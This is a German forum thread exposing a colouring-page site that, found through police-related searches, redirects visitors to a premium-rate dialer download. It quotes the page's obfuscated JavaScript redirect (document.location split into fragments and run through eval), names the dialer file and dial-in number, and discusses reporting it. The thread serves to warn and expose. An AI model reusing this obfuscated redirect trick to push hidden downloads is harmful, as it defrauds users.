Malvorlagen der Polizei Niedersachsen mit Dropcharge-Dialer?

A

Anonymous

Suche nach Malvorlagen + Polizei ergibt u.a. die Seite des screenshots,
script
Code:
<!--
function red()
{
part2=("ument.lo");
one=("doc");
third=("cation='http://www.malv*.de/partner/?pid=mrn-10006&uid=
&payment=dropcharge_ax&dialer_layout=&country =&exe=';");
eval(one+part2+third);
}
red();
// -->
[/quote]

und ab zu malv*.de!

Liebe Polizei in NIedersachsen, bitte dagegen vorgehen, danke

Anhänge

• malvorlagen_polizei.jpg
    malvorlagen_polizei.jpg
    42,8 KB · Aufrufe: 423
sascha schrieb:
Könnte dumm für jemanden ausgehen,
Nicht nur für die "Büttelborn-Connection".
Da gibt es derzeit auch ein "Weihnachts-Layout".
Auf diesem Partnerprogramm fahren inzwischen viele Domains mit verschiedenen Inhabern.
Alleine mit Bezug auf "Polizei" in 1 Minute gefunden:
ohjjaaa, isr-online, cheeers, sogar einer aus Holland: weer24.

Gibt sicher noch einige mehr.

Gruss A. John

sascha schrieb:
Liebe Polizei in NIedersachsen, bitte dagegen vorgehen, danke

Hab die mal freundlich drauf aufmerksam gemacht, was da in ihrem Namen geschieht. Könnte dumm für jemanden ausgehen, zumal die dortigen Ordnungshüter seit Jahren für das Thema sensibilisiert sind. :wink:
polizei niedersachsen schrieb:
Sollte es doch zu einer unbeabsichtigten Interneteinwahl über eine 0190er-Nummer gekommen sein, so ist eine Verfolgung bzw. Bestrafung des Täters / Anbieters nur unter Angabe folgender Informationen sinnvoll bzw. möglich:
[1] * Von welcher Webseite wurde / hat sich der Webdialer installtiert?
[2] * Um welchen Webdialer handelt es sich?
[3] * Welche 0190er-Nummer wurde angewählt?

zu [1] siehe screenshot
zu [2] malvorlagen[mrn-10006,1].exe
zu [3] 090090001243

;)

lol... was sollen die dagegen vorgehen.
Ist es eine eingetragene Wortmarke? Besteht verwechslungsgefahr? Wohl eher nicht.

Davon abgesehen, dass ein normaler Polizeibeamter auch nach 4 Stunden erklärung nicht kapieren wird, wie eine Suchmaschine überhaupt funktioniert.

Nichts wird da passieren.

Bei googlesuche "POLIZEI NIEDERSACHSEN" kommen 3x2 richtige Suchergebnisse und auf Platz 4 (7. Ergebnis) eine Weiterleitseite zu einem Bewerbungsprogramm der Firma... (www.bewerbe-d***:de).

Zu bewerbe-d***:de kommt man mit "POLIZEI BAYERN" auf Platz 4 (bzw. Rang 6: 1+2+2+Treffer)

Das ist eine erfolgreiche Bewerbung für Ärger...

Gast schrieb:
Davon abgesehen, dass ein normaler Polizeibeamter auch nach 4 Stunden erklärung nicht kapieren wird, wie eine Suchmaschine überhaupt funktioniert.
Also da hoffe ich mal, dass Sascha das schon richtig erklärt hat ;)
und falls die Polizei in Bayern Probleme mit einer whois-Abrage hat, da kann ich gerne nachhelfen .
und der Dialer ist hier
P.S.: und wie bewerbe ich mich jetzt bei der Polizei Bayern? z.B. als Chefschnüffler?

P.S.: "Bundeswehr Erding" - Platz 1 (to be continued)

das sind die Vorbesitzer der domain. Der neue Besitzer dieser Domain krallt sich immer wieder mal eine domain... . Hier gibt's einen cache-Eintrag mit Werbung fürs Bewerbungsportal:
Bewerbungsbewerbung schrieb:
7. Erfolgreich Bewerben mit den Tipps der Profis
Willkommen bei bewerbe-D***.de. Mit einer professionellen Bewerbung zum Erfolg! Die Suche nach dem richtigen Arbeitsplatz wird immer ...
www.wi-if****.de/

Anhänge

• polizei_bayern.jpg
    polizei_bayern.jpg
    192,1 KB · Aufrufe: 608
Hm...

Ich kann unsere Gäste beruhigen, ich habe bisher, besonders wenn es um Internetkriminalität ging, ausgesprochen kompetente Polizisten erlebt. Keine Anlernlinge, sondern Spezialisten, denen weder Linux noch ein Webserver fremd sind und das Internet atmen.

Auch wenn ein einzelner Dialer keinen SEK-Einsatz auslöst, wird jeder Fall gesammelt und löst bei entsprechender Häufung Ermittlungen aus, wie verschiedene Fälle in der Vergangenheit gezeigt haben.

Nebelwolf

Zurück
Oben